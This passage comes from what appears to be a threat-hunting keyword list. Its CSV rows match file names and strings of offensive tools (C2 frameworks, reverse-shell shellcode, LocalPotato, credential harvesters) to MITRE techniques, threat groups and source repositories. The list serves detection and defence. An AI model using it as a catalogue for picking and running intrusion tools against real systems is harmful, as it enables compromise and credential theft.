- menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*loader_exe_x64.*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*loader_exe_x86.*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*LoadEWSDLL*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*loadKirbiFile*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*loadliba_reverse_tcp.asm*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*loadliba_shell.asm*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*loadliba_single_shell_reverse_tcp.asm*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,1,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*loadmodule *.ps1*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*loadmodume */modules/*.ps1**,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Local: crc32 compensation attack*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*Local:Get-DelegateType*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Local:Get-PEArchitecture*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Local:Get-ProcAddress*,offensive_tool_keyword,empire,empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-local=0.0.0.0:4001*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*localexploit_demo_template.erb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*localhost/pipe/pwned*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*localhost:1337*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*localhost:1337*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*localhost:3000*striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*localhost:31337*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*localhost:3333*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*localhost:4567*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*localhost:4782*,offensive_tool_keyword,QuasarRAT,Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.,T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060,TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/quasar/Quasar,1,1,N/A,N/A,10,7281,2269,2023-09-06T10:53:31Z,2014-07-08T12:27:59Z -*localhost:53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*localhost:8022*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*localhost:8848*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*localpotato -i*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.exe*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.sln*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.vcxproj*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato.zip*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*LocalPotato-master*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*localreconmodules*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*localrelay_linux_amd64*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*locate password | more*,greyware_tool_keyword,locate,Find sensitive files,T1083 - T1213.002 - T1005,TA0007 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*LocateBrc4Config*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 
- T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*lochiccbgeohimldjooaakjllnafhaid*,greyware_tool_keyword,IP Unblock,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lockless *.dat*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*LockLess.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*Locksmith-main.zip*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,1,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -*log4_shell.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*log4shell*.nessus.org*,offensive_tool_keyword,nessus,Vulnerability scanner,T1046 - T1068 - T1190 - T1201 - T1222 - T1592,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://fr.tenable.com/products/nessus,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*log4shell.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*LoGiC.NET.exe*,offensive_tool_keyword,LoGiC.NET,A more advanced free and open .NET obfuscator using dnlib,T1001,TA0011,N/A,N/A,Defense Evasion,https://github.com/AnErrupTion/LoGiC.NET,1,1,N/A,N/A,5,483,75,2023-08-23T09:55:54Z,2019-12-27T09:48:50Z -*loginsight.thrift*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z 
-*LogonTracer*,offensive_tool_keyword,LogonTracer,LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.,T1057 - T1087 - T1208,TA0006 - TA0007,N/A,N/A,Information Gathering,https://github.com/JPCERTCC/LogonTracer,1,0,N/A,N/A,10,2468,445,2023-09-08T13:32:03Z,2017-11-24T06:07:49Z -*logs/Responder-Session.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logs/ridenum.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logs/shares-with-SCF.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logs/theHarvester.py.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential 
Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*logToBeaconLog*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*LOLBAS-Project*,offensive_tool_keyword,LOLBAS-Project,Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool,T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001,TA0002 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://lolbas-project.github.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LOLBins/NetLoader.xml*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense 
